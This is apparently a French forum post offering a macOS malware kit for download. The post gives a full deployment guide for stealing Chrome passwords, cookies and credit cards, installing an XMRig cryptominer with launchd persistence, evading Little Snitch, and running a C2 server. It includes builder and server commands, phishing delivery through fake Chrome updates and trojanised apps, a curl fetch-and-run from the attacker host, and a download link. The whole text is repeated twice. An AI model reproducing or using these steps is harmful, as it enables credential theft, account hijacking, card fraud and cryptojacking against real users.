Dec 31, 2025 17:06
Reply
Principales fonctionnalités
> Exfiltration des données Chrome (mots de passe, cookies, cartes de crédit)
> Déploiement du mineur XMRig (Monero/Koto)
> Persistance via launchd (survit au redémarrage)
> Contournement de la détection Little Snitch
> Serveur C2 pour l'hébergement de la charge utile et l'exfiltration des données
---
2. Configuration requise
Machine de l'attaquant (serveur)
- Linux/macOS
- Python 3.6+
- openssl (pour la génération de certificats MITM)
Machine victime (cible)
- macOS 10.13+
- Google Chrome installé
- Pas d'EDR/XDR (ou politiques de sécurité faibles)
---
3. Configuration et déploiement
Étape 1 : générer des certificats (proxy MITM)
openssl genrsa -out mitm.key 2048
openssl req -new -x509 -key mitm.key -out mitm.crt -days 3650 -subj "/CN=MITM Proxy CA"
Vous pouvez également le créer à partir de l'option 3 de builder.py.
Étape 2 : Configurer config.json
Exécutez le builder de manière interactive :
python3 builder.py
Sélectionnez l'option 2 (Créer config.json) et remplissez :
- IP du serveur (IP C2 de l'attaquant)
- Port (Par défaut : 8000)
- Algorithme (1 pour yescrypt (Koto), 2 pour rx/0 (Monero))
- Adresse du portefeuille (votre portefeuille XMR)
- URL du pool de minage (par exemple, xmrpool.eu:443)
Étape 3 : Créer des charges utiles
python3 builder.py
Sélectionnez l'option 1 (Créer à partir de config.json).
- Sorties vers PAYLOAD/ :
- com.apple.rig2.plist (lanceur XMRig)
- com.proxy.initialize.plist (voleur Python)
- harmlesslittlecode.py (extracteur de données Chrome)
- uploadminer.sh (script de charge utile principal)
Étape 4 : démarrer le serveur C2
python3 server.py
- Héberge les charges utiles sur http://[SERVER_IP]:8000
- Enregistre les données volées dans uploads/ et cookieminer.db
---
4. Vecteur d'infection (exécution)
Option A : hameçonnage (exécution manuelle)
1. Livrer uploadminer.sh via :
- Faux DMG (« Mise à jour Chrome »)
- Application trojanisée (par exemple, application légitime modifiée)
- Ingénierie sociale (par exemple, « Exécutez ceci pour réparer votre Mac »)
2. La victime exécute :
chmod +x uploadminer.sh && ./uploadminer.sh
Option B : persistance silencieuse (si déjà root)
# Copier les charges utiles vers LaunchAgents
cp PAYLOAD/com.* ~/Library/LaunchAgents/
# Charger la persistance
launchctl load -w ~/Library/LaunchAgents/com.apple.rig2.plist
launchctl load -w ~/Library/LaunchAgents/com.proxy.initialize.plist
# Télécharger et exécuter XMRig
cd /Users/Shared && curl -O http://[SERVER_IP]:8000/xmrig2
chmod +x xmrig2 && ./xmrig2 -a [ALGO] -o [POOL] -u [WALLET] &
---
5. Post-exploitation et collecte de données
Données exfiltrées
- Mots de passe Chrome (décryptés via le trousseau macOS)
- Cookies (détournement de session)
- Cartes de crédit (si elles sont stockées dans Chrome)
- Informations système (via id -un, enregistrement des adresses IP)
Accès aux données volées
- Vérifiez la présence de fichiers .zip dans uploads/ (par victime).
- Interrogez cookieminer.db :
sqlite3 cookieminer.db "SELECT * FROM uploads;"
Download : https://files.catbox.moe/v5kbmn.zip
> Exfiltration des données Chrome (mots de passe, cookies, cartes de crédit)
> Déploiement du mineur XMRig (Monero/Koto)
> Persistance via launchd (survit au redémarrage)
> Contournement de la détection Little Snitch
> Serveur C2 pour l'hébergement de la charge utile et l'exfiltration des données
---
2. Configuration requise
Machine de l'attaquant (serveur)
- Linux/macOS
- Python 3.6+
- openssl (pour la génération de certificats MITM)
Machine victime (cible)
- macOS 10.13+
- Google Chrome installé
- Pas d'EDR/XDR (ou politiques de sécurité faibles)
---
3. Configuration et déploiement
Étape 1 : générer des certificats (proxy MITM)
openssl genrsa -out mitm.key 2048
openssl req -new -x509 -key mitm.key -out mitm.crt -days 3650 -subj "/CN=MITM Proxy CA"
Vous pouvez également le créer à partir de l'option 3 de builder.py.
Étape 2 : Configurer config.json
Exécutez le builder de manière interactive :
python3 builder.py
Sélectionnez l'option 2 (Créer config.json) et remplissez :
- IP du serveur (IP C2 de l'attaquant)
- Port (Par défaut : 8000)
- Algorithme (1 pour yescrypt (Koto), 2 pour rx/0 (Monero))
- Adresse du portefeuille (votre portefeuille XMR)
- URL du pool de minage (par exemple, xmrpool.eu:443)
Étape 3 : Créer des charges utiles
python3 builder.py
Sélectionnez l'option 1 (Créer à partir de config.json).
- Sorties vers PAYLOAD/ :
- com.apple.rig2.plist (lanceur XMRig)
- com.proxy.initialize.plist (voleur Python)
- harmlesslittlecode.py (extracteur de données Chrome)
- uploadminer.sh (script de charge utile principal)
Étape 4 : démarrer le serveur C2
python3 server.py
- Héberge les charges utiles sur http://[SERVER_IP]:8000
- Enregistre les données volées dans uploads/ et cookieminer.db
---
4. Vecteur d'infection (exécution)
Option A : hameçonnage (exécution manuelle)
1. Livrer uploadminer.sh via :
- Faux DMG (« Mise à jour Chrome »)
- Application trojanisée (par exemple, application légitime modifiée)
- Ingénierie sociale (par exemple, « Exécutez ceci pour réparer votre Mac »)
2. La victime exécute :
chmod +x uploadminer.sh && ./uploadminer.sh
Option B : persistance silencieuse (si déjà root)
# Copier les charges utiles vers LaunchAgents
cp PAYLOAD/com.* ~/Library/LaunchAgents/
# Charger la persistance
launchctl load -w ~/Library/LaunchAgents/com.apple.rig2.plist
launchctl load -w ~/Library/LaunchAgents/com.proxy.initialize.plist
# Télécharger et exécuter XMRig
cd /Users/Shared && curl -O http://[SERVER_IP]:8000/xmrig2
chmod +x xmrig2 && ./xmrig2 -a [ALGO] -o [POOL] -u [WALLET] &
---
5. Post-exploitation et collecte de données
Données exfiltrées
- Mots de passe Chrome (décryptés via le trousseau macOS)
- Cookies (détournement de session)
- Cartes de crédit (si elles sont stockées dans Chrome)
- Informations système (via id -un, enregistrement des adresses IP)
Accès aux données volées
- Vérifiez la présence de fichiers .zip dans uploads/ (par victime).
- Interrogez cookieminer.db :
sqlite3 cookieminer.db "SELECT * FROM uploads;"
Download : https://files.catbox.moe/v5kbmn.zip